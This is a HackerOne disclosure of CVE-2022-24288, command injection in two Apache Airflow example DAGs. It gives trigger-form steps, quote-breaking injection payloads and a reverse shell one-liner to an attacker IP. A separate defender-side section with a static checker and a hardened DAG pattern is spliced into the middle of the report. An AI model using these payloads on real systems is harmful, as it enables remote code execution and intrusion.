HackerOne report #1492896 by happyhacking123, Feb 27, 2022 - 4:49 a.m.

Internet Bug Bounty: CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs

2022-02-27 04:49:04
happyhacking123
hackerone.com
80
apache airflow
rce
cve-2022-24288
command injection
example dags
vulnerability exploitation
internet bug bounty

EPSS: 0.949

Percentile: 99.3%

In Apache Airflow prior to version 2.2.4, two of the example DAG scripts shipped with Airflow contain command injection vulnerabilities (RCE) that let an attacker execute arbitrary commands on the system. The impact is even greater when Airflow is configured for unauthenticated access. Both RCEs are assigned the same CVE number (CVE-2022-24288).

Impact

# RCE one: example_passing_params_via_test_command.py command injection

## Vulnerability summary:
In Apache Airflow prior to version 2.2.4, there is a command injection vulnerability (RCE) in the example DAG script example_passing_params_via_test_command.py, through which an attacker can run arbitrary commands on the operating system.
## Vulnerability principle:

  1. The source code of the example_passing_params_via_test_command script shows that it executes a bash command. The parameters foo and miff in the template expressions {{ params.foo }} and {{ params.miff }} are externally controllable and are rendered through the Jinja2 template:

{F1634883}

{F1634884}
2. Further analysis of the code behind “from airflow.operators.bash import BashOperator” shows that the value of the bash_command parameter is executed as a bash script;

{F1634885}

## Vulnerability exploitation:

  1. Open the DAGs menu, locate the example_passing_params_via_test_command DAG and select “Trigger DAG w/ config”.

http://192.168.3.17:8080/trigger?dag_id=example_passing_params_via_test_command

{F1634887}
2. To construct the payload, we can see from the following code that we need to close the double quotation marks and append commands separated by semicolons, so that arbitrary operating system commands are injected and executed (RCE).

{F1634888}
PAYLOAD: {"foo":"\";touch /tmp/pwnedaaaaa;\""}, then click Trigger to execute the task.

{F1634889}

{F1634890}
The log and the background view show that the injected command was executed successfully.

{F1634891}

{F1634892}
3. Further, execute a reverse shell to obtain operating system access.
Payload: {"foo":"\";bash -i >& /dev/tcp/192.168.3.7/6666 0>&1;\""}

{F1634893}

{F1634894}

# RCE two: tutorial.py DAG command injection

## Vulnerability summary:
There is a command injection vulnerability (RCE) in the example DAG script tutorial.py, through which an attacker can execute arbitrary commands on the system.
## Vulnerability principle:

  1. The source code of the tutorial script shows that it executes a bash command. The parameter “my_param” in the template expression {{params.my_param}} is externally controllable and is rendered through the Jinja2 template:

{F1634906}
2. Further analysis of the code behind “from airflow.operators.bash import BashOperator” shows that the value of the bash_command parameter is executed as a bash script;

{F1634907}
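Both principle sections describe the same root cause: a run-time parameter is rendered by Jinja2 straight into bash_command, so whatever the triggering user supplies becomes shell source text. As an added, defender-side example (this is not code from the report or from Apache Airflow), the following check parses DAG files with Python's standard ast module and flags every BashOperator whose bash_command embeds a {{ params.* }} expression. The two DAG sources embedded in it are constructed to mimic tutorial.py: the first reproduces the vulnerable pattern, the second shows the mitigation that Airflow's BashOperator documentation recommends for user-supplied values, passing them through env so that bash expands "$MY_PARAM" inside quotes instead of parsing the value as a command. The function and variable names (find_templated_bash_params, VULNERABLE_DAG, HARDENED_DAG) are mine, not Airflow's.

```python
"""Static check for the pattern behind CVE-2022-24288 in Airflow DAG files.

Added example (not code from the report or from Apache Airflow): it parses a
DAG file with the standard-library ast module and reports every BashOperator
whose bash_command string embeds a run-time parameter such as
"{{ params.my_param }}", which is what both example DAGs did.
"""
import ast
import re
from typing import Dict, List, Optional

# A Jinja expression that reads a run-time parameter, e.g. "{{ params.foo }}".
PARAM_REF = re.compile(r"\{\{\s*params\.(\w+)")


def _callee_name(node: ast.Call) -> str:
    """Return the bare name being called: "BashOperator" for both
    BashOperator(...) and bash.BashOperator(...)."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return ""


def _literal_string(node: Optional[ast.AST], known: Dict[str, str]) -> Optional[str]:
    """Resolve an expression node to a str literal when that is statically possible.

    Handles string constants, "a" + "b" concatenation, dedent("...") wrappers
    (the style tutorial.py uses) and names bound to such strings elsewhere in
    the file. Anything built dynamically resolves to None.
    """
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left = _literal_string(node.left, known)
        right = _literal_string(node.right, known)
        if left is not None and right is not None:
            return left + right
    if isinstance(node, ast.Call) and node.args and _callee_name(node) == "dedent":
        return _literal_string(node.args[0], known)
    if isinstance(node, ast.Name):
        return known.get(node.id)
    return None


def find_templated_bash_params(dag_source: str) -> List[dict]:
    """Return one finding per BashOperator whose bash_command embeds {{ params.* }}."""
    tree = ast.parse(dag_source)

    # Pass 1: remember every simple string assignment (module level or inside a
    # `with DAG(...)` block) so that bash_command=templated_command resolves.
    known: Dict[str, str] = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            value = _literal_string(node.value, known)
            if value is not None:
                known[node.targets[0].id] = value

    # Pass 2: inspect every BashOperator(...) call in the file.
    findings: List[dict] = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or _callee_name(node) != "BashOperator":
            continue
        kwargs = {kw.arg: kw.value for kw in node.keywords if kw.arg}
        command = _literal_string(kwargs.get("bash_command"), known)
        if command is None:
            continue  # built dynamically (f-string, .format): review by hand
        params = sorted(set(PARAM_REF.findall(command)))
        if params:
            task_id = _literal_string(kwargs.get("task_id"), known) or "<unknown>"
            findings.append({"line": node.lineno, "task_id": task_id, "params": params})
    return findings


# Constructed sample modelled on tutorial.py: the parameter lands inside the
# command text, so a value containing `";` closes the quote and starts a new command.
VULNERABLE_DAG = '''
from textwrap import dedent
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG("tutorial_like", params={"my_param": "Parameter I passed in"}) as dag:
    templated_command = dedent(
        """
        echo "{{ ds }}"
        echo "{{ params.my_param }}"
        """
    )
    t3 = BashOperator(task_id="templated", bash_command=templated_command)
'''

# Constructed hardened form: the value reaches bash as an environment variable
# and is expanded inside double quotes, so the shell never parses it as code.
HARDENED_DAG = '''
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG("tutorial_like", params={"my_param": "Parameter I passed in"}) as dag:
    t3 = BashOperator(
        task_id="templated",
        bash_command='echo "$MY_PARAM"',
        env={"MY_PARAM": "{{ params.my_param }}"},
    )
'''

if __name__ == "__main__":
    for label, source in (("vulnerable", VULNERABLE_DAG), ("hardened", HARDENED_DAG)):
        print(label, find_templated_bash_params(source))
```

Run over a dags folder in CI, the check reports the vulnerable sample (task "templated", parameter my_param) and nothing for the hardened one. Name resolution is deliberately shallow: a bash_command assembled with an f-string or .format() is skipped rather than guessed at, so those tasks still need a manual look. Upgrading to 2.2.4 removes the affected example DAGs, and Airflow's [core] load_examples setting can keep example DAGs out of production entirely, but custom DAGs that copy the same pattern stay exploitable, which is what this check is for.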
## Vulnerability exploitation:

  1. Open the DAGs menu, locate the tutorial DAG and select “Trigger DAG w/ config”.

http://192.168.3.17:8080/trigger?dag_id=tutorial

{F1634908}
2. To construct the payload, we can see from the following code that we need to close the double quotation marks and append commands separated by semicolons, so that arbitrary operating system commands are injected and executed (RCE).

{F1634913}
PAYLOAD: {"my_param":"\";touch /tmp/pwnedddddd;\""}, then click Trigger to execute the task.

{F1634915}

{F1634916}
The log and the background view show that the injected command was executed successfully.

{F1634917}